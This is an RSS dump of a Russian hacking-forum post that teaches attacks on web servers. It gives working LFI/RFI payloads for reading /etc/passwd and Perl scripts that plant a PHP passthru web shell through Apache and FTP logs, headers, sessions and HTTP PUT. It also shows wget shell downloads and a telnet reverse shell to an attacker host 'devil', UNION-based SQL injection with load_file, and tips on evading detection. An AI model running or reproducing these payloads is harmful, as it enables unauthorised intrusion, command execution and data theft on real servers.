Rich244 http://rich244.mybb.forum/ Rich244 ru-ru Thu, 02 Jul 2009 23:07:17 +0400 MyBB/mybb.ru Веб-уязвимости для получения доступа к системе http://rich244.mybb.forum/viewtopic.php?pid=2#p2 <p>1.Введение <br />Всем привет,приступим сразу к делу,сегодня я вам расскажу о уже всем известных SQL,XSS,а также о малоизвестных LFI, RFI, SSI, ICH.Я не буду банально рассказывать вам теорию миллиард первый раз о ксс и скулях,я покажу вам что с ними можно сделать ;)Поехали.</p> <p>2.LFI/RFI<br />2.1.Введение<br />Данный тип атак хорошо известен многим,он заключается в том,что когда система считывает файлы используются &quot;плохие&quot; запрограммированые страницы,которые делают отстук на следующие файлы,требуя включать команды)<br />Логично,что при таких отстуках необохдимо не инициализировать переменные,вот так:</p> <p>&#160; Код:&#160; &#160;</p> <p>require($file);<br />require(&quot;includes/&quot;.$file);<br />require(&quot;languages/&quot;.$lang.&quot;.php&quot;);<br />require(&quot;themes/&quot;.$tema.&quot;/config.php&quot;);</p> <p>Методов проексплоить его дохрена поэтому сразу привожу примеры:</p> <p>Type of call:</p> <p>&#160; Код:&#160; &#160;</p> <p>require($file);</p> <p>Exploit:</p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/?file=/etc/passwd</p> <p>Type of call:</p> <p>&#160; Код:&#160; &#160;</p> <p>require(&quot;includes/&quot;.$file);</p> <p>Exploit:</p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/?file=../../../../../etc/passwd</p> <p>Type of call:</p> <p>&#160; Код:&#160; &#160;</p> <p>require(&quot;languages/&quot;.$lang.&quot;.php&quot;);<br />require(&quot;themes/&quot;.$theme.&quot;/config.php&quot;);</p> <p>Exploit:</p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/?file=../../../../../etc/passwd%00</p> <p>Type of call:</p> <p>&#160; Код:&#160; &#160;</p> <p>require(&quot;languages/&quot;.$_COOKIE['lang'].&quot;.php&quot;);</p> <p>Exploit:</p> <p>&#160; Код:&#160; &#160;</p> <p>javascript:document.cookie = &quot;lan=../../../../../etc/passwd%00&quot;;</p> <p>А вот этот скрипт поможет вам заекспить данную багу через Post или Get запросы:</p> <p>&#160; Код:&#160; &#160;</p> <p>#! /usr/bin/perl</p> <p># perl script to exploit LFI based in GET and POST requests<br /># Example: <a href="http://site.com/index.php?var=" rel="nofollow" target="_blank">http://site.com/index.php?var=</a><br /># URL: <a href="http://site.com/index.php" rel="nofollow" target="_blank">http://site.com/index.php</a><br /># Variable: var<br /># Method: POST<br />#<br /># by Pepelux (pepelux[at]enye-sec[dot]org)</p> <p>use LWP::UserAgent;<br />$ua = LWP::UserAgent-&gt;new;</p> <p>my ($host, $var, $method) = @ARGV ;</p> <p>unless($ARGV[2]) {<br />print &quot;Usage: perl $0 &lt;url&gt; &lt;vulnerable_var&gt; &lt;method&gt;\n&quot;;<br />print &quot;\tex: perl $0 <a href="http://site.com/index.php" rel="nofollow" target="_blank">http://site.com/index.php</a> var GET\n&quot;;<br />print &quot;\tex: perl $0 <a href="http://site.com/index.php" rel="nofollow" target="_blank">http://site.com/index.php</a> var POST\n\n&quot;;<br />exit 1;<br />}</p> <p>$ua-&gt;agent(&quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1)&quot;);<br />$ua-&gt;timeout(10);<br />$host = &quot;http://&quot;.$host if ($host !~ /^http:/);</p> <p>while () {<br />print &quot;file to edit: &quot;;<br />chomp($file=&lt;STDIN&gt;);</p> <p>if ($method =~ /GET/) {<br />$url = $host.&quot;?&quot;.$var.&quot;=../../../../..&quot;.$file.&quot;%00&quot;;<br />$req = HTTP::Request-&gt;new(GET =&gt; $url);<br />$req-&gt;header('Accept' =&gt; 'text/html');<br />}<br />else {<br />$req = HTTP::Request-&gt;new(POST =&gt; $host);<br />$req-&gt;content_type('application/x-www-form-urlencoded');<br />$req-&gt;content($var.&quot;=../../../../&quot;.$file.&quot;%00&quot;);<br />}</p> <p>$res = $ua-&gt;request($req);</p> <p>if ($res-&gt;is_success) {<br />$result = $res-&gt;content;<br />print $result;<br />}<br />else { print &quot;Error\n&quot;; }<br />}</p> <p>2.2.Выполнение команды удаленно <br />Этот тип уязвимости возможен для любой системы,где файлы доступны пользователю для чтения,но можно и выполнять некоторые системные команды.<br />Для этого нам нужно написать в любом файле этот код:</p> <p>&#160; Код:&#160; &#160;</p> <p>&lt;? passthru ($ _GET [CMD])?&gt;</p> <p>СMD-это имя нашей переменной для отправки данных через GET</p> <p>Теперь ищем место где можно записать данные,это можно осуществить несколькими способами:</p> <p>2.2.1 Иньекции в PHP кодах в логах Apache<br />Мы знаем, что Apache сервер сохраняет логи всех операций, в access_log и<br />error_log.Мы можем играть с зареганами данными и использовать пхп коды.<br />Например, чтобы поместить в error_log файл достаточно сделать вызов<br />несуществующей страницы,но отправку кода осуществляем в файл:</p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/xxxxxxx = &lt;? passthru (\ $ _GET [CMD])?&gt;</p> <p>Это добавит строку в error_log,и нам останется загрузить файл таким же способом как мы делали до этого и отправить через цмд команды для исполнения:<br />http://host/?file=../../../var/apache/error_log&amp;cmd=ls /etc</p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/?file=../../../var/apach..._log&amp;cmd=uname -a</p> <p>Теперь остается узнать когад мы можем трогать логи апача,а зависит это от операционной системи и админа)Один из вариантов заключается в поиске типичных дерикторий где хранятся логи:</p> <p>&#160; Код:&#160; &#160;</p> <p>/var/log/apache/<br />/var/log/httpd/<br />/usr/local/apache/logs/<br />......</p> <p>В общем на серве мы видим:</p> <p>&#160; Код:&#160; &#160;</p> <p>/path/host.com/www<br />/logs<br />/data</p> <p>В этом случае мутим путь файла для несуществующей директории:<br />http://host/?file=xxxx </p> <p>И на экране в этом случае увидим:</p> <p>Инуитивно понятно,что логи в:<br />/var/www/host.com/logs</p> <p>Другой вариант,это в файле httpd.conf посмотреть :<br />ErrorLog /var/log/apache/error.log</p> <p>Или вот так в шаровом:<br />ErrorLog /home/chs/host.com/home/logs/error_log</p> <p>Но как я писал жто зависит от ОС и версии Апача...</p> <p>Также можно обнаружить логи апача в проц.таблице:<br />/proc/{PID}/fd/{FD_ID} (только на некоторых системах так канает)</p> <p>и юзаем этот скрипт:</p> <p>&#160; Код:&#160; &#160;</p> <p>#! /usr/bin/perl</p> <p># perl script to serach apache logs path<br /># Example:<br /># URL: http://site/index.php<br /># Variable: file<br /># Method: POST<br />#<br /># by Pepelux (pepelux[at]enye-sec[dot]org)</p> <p>use LWP::UserAgent;<br />$ua = LWP::UserAgent-&gt;new;</p> <p>my ($host, $var, $method) = @ARGV ;</p> <p>unless($ARGV[2]) {<br />print &quot;Usage: perl $0 &lt;url&gt; &lt;vulnerable_var&gt; &lt;method&gt;\n&quot;;<br />print &quot;\tex: perl $0 <a href="http://site.com/index.php" rel="nofollow" target="_blank">http://site.com/index.php</a> file GET\n&quot;;<br />print &quot;\tex: perl $0 <a href="http://site.com/index.php" rel="nofollow" target="_blank">http://site.com/index.php</a> file POST\n\n&quot;;<br />exit 1;<br />}</p> <p>$ua-&gt;agent(&quot;&lt;? passthru(\$_GET[cmd]) ?&gt;&quot;);<br />$ua-&gt;timeout(10);<br />$host = &quot;http://&quot;.$host if ($host !~ /^http:/);</p> <p>if ($method =~ /GET/) {<br />$url = $host.&quot;?&quot;.$var.&quot;=../../../../proc/self/stat%00&quot;;<br />$req = HTTP::Request-&gt;new(GET =&gt; $url);<br />$req-&gt;header('Accept' =&gt; 'text/html');<br />}<br />else {<br />$req = HTTP::Request-&gt;new(POST =&gt; $host);<br />$req-&gt;content_type('application/x-www-form-urlencoded');<br />$req-&gt;content($var.&quot;=../../../../proc/self/stat%00&quot;);<br />}</p> <p>$res = $ua-&gt;request($req);</p> <p>if ($res-&gt;is_success) {<br />$result = $res-&gt;content;<br />$result =~ s/&lt;[^&gt;]*&gt;//g;<br />$x = index($result, &quot; &quot;, 0);<br />$pid = substr($result, 0, $x);</p> <p>print &quot;Apache PID: &quot;.$pid.&quot;\n&quot;;<br />}</p> <p>if ($method =~ /GET/) {<br />$url = $host.&quot;?&quot;.$var.&quot;=../../../../proc/self/status%00&quot;;<br />$req = HTTP::Request-&gt;new(GET =&gt; $url);<br />$req-&gt;header('Accept' =&gt; 'text/html');<br />}<br />else {<br />$req = HTTP::Request-&gt;new(POST =&gt; $host);<br />$req-&gt;content_type('application/x-www-form-urlencoded');<br />$req-&gt;content($var.&quot;=../../../../proc/self/status%00&quot;);<br />}</p> <p>$res = $ua-&gt;request($req);</p> <p>if ($res-&gt;is_success) {<br />$result = $res-&gt;content;<br />$result =~ s/&lt;[^&gt;]*&gt;//g;<br />$x = index($result, &quot;FDSize&quot;,0)+8;<br />$fdsize = substr($result, $x, 3);</p> <p>print &quot;FD_SIZE: &quot;.$fdsize.&quot;\n&quot;;<br />}</p> <p>for ($cont = 0; $cont &lt; $fdsize; $cont++) {<br />$file = &quot;../../../../proc/&quot;.$pid.&quot;/fd/&quot;.$cont;<br />open FILE, $file;</p> <p>while(&lt;FILE&gt;) {<br />if (($_ =~ /does not exist/) &amp;&amp; ($_ =~ /passthru/)) {<br />print &quot;FD: &quot;.$cont.&quot;\n&quot;;<br />exit;<br />}<br />}<br />}</p> <p>результат будет примерно таким:</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl proc.pl http://host/index.php page GET<br />Apache PID: 4191<br />FD_SIZE: 64<br />FD: 2</p> <p>Также можно использовать иньекции через урл,который не возвращает к ошибке:<br />http://host/index.php?x = &lt;? passthru (\ $ _GET [CMD])?&gt; </p> <p>ПОможет нам этот скрипт:</p> <p>&#160; Код:&#160; &#160;</p> <p>#! /usr/bin/perl</p> <p># perl script to inject a CMD in a web LFI vulnerable<br /># Example:<br /># Host: <a href="http://host.com" rel="nofollow" target="_blank">http://host.com</a><br /># type: U<br />#<br /># by Pepelux (pepelux[at]enye-sec[dot]org)</p> <p>use LWP::UserAgent;<br />$ua = LWP::UserAgent-&gt;new;</p> <p>my ($host, $type) = @ARGV ;<br />$code=&quot;&lt;? passthru(\$_GET[cmd]) ?&gt;&quot;;</p> <p>unless($ARGV[1]) {<br />print &quot;Usage: perl $0 &lt;url&gt; [URI|UAG|REF]\n&quot;;<br />print &quot;\tURI: URI\n&quot;;<br />print &quot;\tUAG: User-Agent\n&quot;;<br />print &quot;\tREF: Referer\n\n&quot;;<br />print &quot;\tex: perl $0 <a href="http://host.com" rel="nofollow" target="_blank">http://host.com</a> URI\n&quot;;<br />exit 1;<br />}</p> <p>$host = &quot;http://&quot;.$host if ($host !~ /^http:/);</p> <p>if ($type =~ /UAG/) { $ua-&gt;agent($code); }<br />else { $ua-&gt;agent(&quot;Mozilla/5.0&quot;); }</p> <p>if ($type =~ /URI/) { $$host .= &quot;/&quot; . $code; }</p> <p>$req = HTTP::Request-&gt;new(POST =&gt; $host);<br />$req-&gt;content_type('application/x-www-form-urlencoded');<br />$req-&gt;content(&quot;x=x&quot;);</p> <p>if ($type =~ /REF/) { $req-&gt;referer($code); }</p> <p>$res = $ua-&gt;request($req);</p> <p>Ввод в error_log для направления в несуществующий урл:</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl cmd.pl <a href="http://host.com/blabla" rel="nofollow" target="_blank">http://host.com/blabla</a> URI</p> <p>В error_log мы видим: </p> <p>&#160; Код:&#160; &#160;</p> <p>[Wed Oct 08 12:50:00 2008] [error] [client 11.22.33.44] File does not<br />exist: /home/chs/host.com/home/html/blabla</p> <p>Попытка с User-Agent: </p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl cmd.pl <a href="http://host.com/blabla" rel="nofollow" target="_blank">http://host.com/blabla</a> UAG</p> <p>В error_log мы видим одно и то же:</p> <p>&#160; Код:&#160; &#160;</p> <p>[Wed Oct 08 12:50:00 2008] [error] [client 11.22.33.44] File does not<br />exist: /home/chs/host.com/home/html/blabla</p> <p>Попытки со ссылками: </p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl cmd.pl <a href="http://host.com/blabla" rel="nofollow" target="_blank">http://host.com/blabla</a> REF</p> <p>В этом случае мы получим результат иньекции:</p> <p>&#160; Код:&#160; &#160;</p> <p>[Wed Oct 08 12:52:54 2008] [error] [client 11.22.33.44] File does not<br />exist: /home/chs/host.com/home/html/blabla, referer: &lt;? passthru($_GET[cmd])<br />?&gt;</p> <p>Теперь мы собираемся написать в access_log более менее &quot;весомуб инфу&quot;(чтоб не запалили)</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl cmd.pl <a href="http://host.com/index.php" rel="nofollow" target="_blank">http://host.com/index.php</a> URI</p> <p>В этом случае мы получим: </p> <p>&#160; Код:&#160; &#160;</p> <p>11.22.33.44 - - [08/Oct/2008:12:57:39&#160; 0200] &quot;POST<br />/index.php/&lt;? passthru($_GET[cmd]) ?&gt; HTTP/1.1&quot; 301 - &quot;-&quot;<br />&quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820<br />Firefox/3.0.1&quot;</p> <p>Попытка с User-Agent: </p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl cmd.pl <a href="http://host.com/index.php" rel="nofollow" target="_blank">http://host.com/index.php</a> UAG</p> <p>Иньекция:</p> <p>&#160; Код:&#160; &#160;</p> <p>11.22.33.44 - - [08/Oct/2008:13:00:05&#160; 0200] &quot;POST<br />/index.php HTTP/1.1&quot; 301 - &quot;-&quot; &quot;&lt;? passthru($_GET[cmd]) ?&gt;&quot;</p> <p>Попытки со ссылками:</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ perl cmd.pl <a href="http://host.com/index.php" rel="nofollow" target="_blank">http://host.com/index.php</a> REF</p> <p>Мы также получим инъекцию: </p> <p>&#160; Код:&#160; &#160;</p> <p>11.22.33.44 - - [08/Oct/2008:13:00:56&#160; 0200] &quot;POST<br />/index.php HTTP/1.1&quot; 301 - &quot;&lt;? passthru($_GET[cmd]) ?&gt;&quot; &quot;Mozilla/5.0 (X11;<br />U; Linux i686; en-US; rv:1.9.0.1)Gecko/2008072820 Firefox/3.0.1&quot;</p> <p>2.2.2.Внедрение иньекционных PHP кодов в процессорную таблицу,изображения и сессии</p> <p>Суть заключается в том,что я отправляю через User-Agent файл http://host/?file=../../../proc/self/environ&amp;cmd=uname - .Впринципе это все для проц.таблы<br />Насчет изображений,мутим в файл <br />&#160; Код:&#160; &#160;</p> <p>&lt;? passthru ($ _GET [CMD])?&gt;</p> <p>и осуществеление этого способа будет ЛФИ все для того же http://host/?file=path/avatar.gif&amp;cmd=uname - </p> <p>Уязвимый код в сессии:</p> <p>&#160; Код:&#160; &#160;</p> <p>&lt;?php<br />$user = $_GET['user'];<br />session_register(&quot;user&quot;);<br />session_start();<br />?&gt;</p> <p>Как мы видим, она создает сессию с помощью переменной величины, полученной путем GET<br />без каких-либо проверок. </p> <p>Мы можем направить:<br />&#160; Код:&#160; &#160;</p> <p>http://host/?user = &lt;? passthru ($ _GET [CMD])?&gt;</p> <p>И при просмотре Cookies нашего штурмана мы можем видеть, что:<br />PHPSESSID = b25ca6fea480073cf8eb840b203d343e</p> <p>Анализ сессии папки мы можем видеть содержимое:</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ more /tmp/sess_b25ca6fea480073cf8eb840b203d343e<br />user</p> <p>2.2.3.Внедрение кода в другие файлы</p> <p>Обычно мы не имеем прав для загрузки чего-либо в другие файлы,но у нас же есть ФТП логи:</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ ftp host.com<br />220 ProFTPD 1.3.1 Server (Debian) [host.com]<br />Name (pepelux): &lt;? passthru($_GET[cmd]) ?&gt;<br />Password:</p> <p>Если мы посмотрим на /var/log/proftpd/proftpd.log мы увидим,что наш код ввиден:</p> <p>&#160; Код:&#160; &#160;</p> <p>Oct 09 21:50:21 host.com proftpd[11190] host.com<br />([11.22.33.44]): USER &lt;? passthru($_GET[cmd]) ?&gt;: no such user found<br />from [11.22.33.44] to host.com:21</p> <p>Если уязвимые сервера используют старую версию Webalizer, мы также можем использовать файл usage_DATE.html для внедрение кода:</p> <p>&#160; Код:&#160; &#160;</p> <p>Referer: &lt;? passthru($_GET[cmd]) ?&gt;</p> <p>В случае, если сервер Apache допускает PUT команды мы также можем загрузить файл<br />с нашим кодом: </p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ telnet host.com 80<br />Trying 11.22.33.44...<br />Connected to host.com.<br />Escape character is '^]'.<br />OPTIONS / HTTP/1.1</p> <p>&#160; Код:&#160; &#160;</p> <p>HTTP/1.1 200 OK<br />Date: Sat, 11 Oct 2008 15:06:05 GMT<br />Server: Apache/2.2.9 (Debian) PHP/5.2.6-5<br />Allow: GET,HEAD,POST,PUT,OPTIONS,TRACE<br />Content-Length: 0<br />Connection: close<br />Content-Type: httpd/unix-directory</p> <p>Connection closed by foreign host.</p> <p>Иньекция:</p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ telnet host.com 80<br />Trying 11.22.33.44...<br />Connected to host.com.<br />Escape character is '^]'.<br />PUT /file.txt HTTP/1.1<br />Content-Type: text/plain<br />Content-Length:26</p> <p>&lt;? passthru($_GET[cmd]) ?&gt;</p> <p>2.3.Загрузка шелла</p> <p>Если мы сможем выполнять команды удаленно мы можем попытаться загрузить шелл чтоб иметь больший доступ к системе.<br />Одним из методов является создание основой шелла.Мы можем загружать его с помощью Wget команды: </p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/?file=xxxx&amp;cmd=wget http://devil/shell.txt-O shell.php</p> <p>Поскольку мы не можем загрузить файл на PHP мы можем замутит в тхт а потом переиминовать)<br />Мы также можем попытаться сделать обратный Telnet: </p> <p>&#160; Код:&#160; &#160;</p> <p>pepelux:~$ nc -vv -l -p 8888<br />pepelux:~$ nc -vv -l -p 8889</p> <p>http://host/?file=xxxx&amp;cmd=telnet devil 8888 | /bin/sh | telnet devil 8889</p> <p>Если allow_url_include в php.ini, мы можем юзать шелл напрямую.Метод известен:<br />Загружаем через Гет или Пост шелл:</p> <p>&#160; Код:&#160; &#160;</p> <p>http://host/?file=http://devil.com/shell.txt<br />http://host/?file=http://devil.com/shell.txt%00</p> <p>3Blind SQL-инъекции <br />Перейду сразу к практите,так как об этих уязвимостях я уже писал в <a href="http://forum.xaknet.ru/thread5614.html" rel="nofollow" target="_blank">http://forum.xaknet.ru/thread5614.html</a></p> <p>И так,Если стоит разрешение на load_file мы можем прочитать некие системные файлы<br />/etc/passwd</p> <p>Пример:</p> <p>Уязвимый код:</p> <p>&#160; Код:&#160; &#160;</p> <p>&lt;?php<br />$iduser = $_GET['$id'];<br />$link = mysql_connect(&quot;localhost&quot;, &quot;mysql_user&quot;, &quot;mysql_password&quot;);<br />mysql_select_db(&quot;database&quot;, $link);</p> <p>$result = mysql_query(&quot;SELECT * FROM users WHERE id=$iduser&quot;, $link);<br />$row = mysql_fetch_array($result);</p> <p>echo &quot;User mail is:&quot; . $row[&quot;mail&quot;] . &quot;\n&quot;;<br />?&gt;</p> <p>Мы незнаем колчиство столбцов и полей,но мы знаем,верное значение http://host/?id=2<br />Мы пытаемся изменить результаты запроса в SQL-инъекции: <br />http://host/?id=2 ORDER BY 1 ... Ok<br />http://host/?id=2 ORDER BY 2 ... Ok<br />http://host/?id=2 ORDER BY 3 ... Ok<br />http://host/?id=2 ORDER BY 4 ... Ok<br />http://host/?id=2 ORDER BY 5 ... Error</p> <p>Изменяя подзапросы мы подбираем 4 колонки(дело техники):<br />http://host/?id=-1 UNION SELECT 1,2,3,4</p> <p>Высылаем соответственно:<br />http://host/?id=2 UNION SELECT 1,2,3,4</p> <p>Мы получаем:<br /><br /></p> <p>Поскольку это первый ряд мы увидм:<br />User mail is: pepelux@host<br />Если мы ставим ID =- 1 мы будем получать данные: </p> <p>Отправялем:<br />http://host/?id=-1 UNION SELECT 1,2,3,4</p> <p>Получаем:</p> <p>На экране мы видим User mail is: 4 <br />Мы можем использовать 4-ую колонку для иньекции:<br />http://host/?id=-1 UNION SELECT 1,2,3,load_file('/etc/passwd');<br />Вобщем что тут разжоыввать,дело техники,писалось об этом неоднакратно и много<br />ВОбщем конкретно надоело уже писать,всем удачи)))рекомендую к прочтению:<br />- <a href="http://www.g-brain.net/tutorials/loc...inclusions.txt" rel="nofollow" target="_blank">http://www.g-brain.net/tutorials/loc...inclusions.txt</a><br />- <a href="http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt" rel="nofollow" target="_blank">http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt</a><br />- <a href="http://www.securityfocus.com/bid/3473" rel="nofollow" target="_blank">http://www.securityfocus.com/bid/3473</a><br />- <a href="http://dev.mysql.com/doc/" rel="nofollow" target="_blank">http://dev.mysql.com/doc/</a></p> <p>(с)baltazar<br />-------------------------</p> mybb@mybb.ru (Alex1993) Thu, 02 Jul 2009 23:07:17 +0400 http://rich244.mybb.forum/viewtopic.php?pid=2#p2 Тестовое сообщение http://rich244.mybb.forum/viewtopic.php?pid=1#p1 <p>Благодарим за выбор нашего сервиса!</p> mybb@mybb.ru (Alex1993) Thu, 02 Jul 2009 23:02:24 +0400 http://rich244.mybb.forum/viewtopic.php?pid=1#p1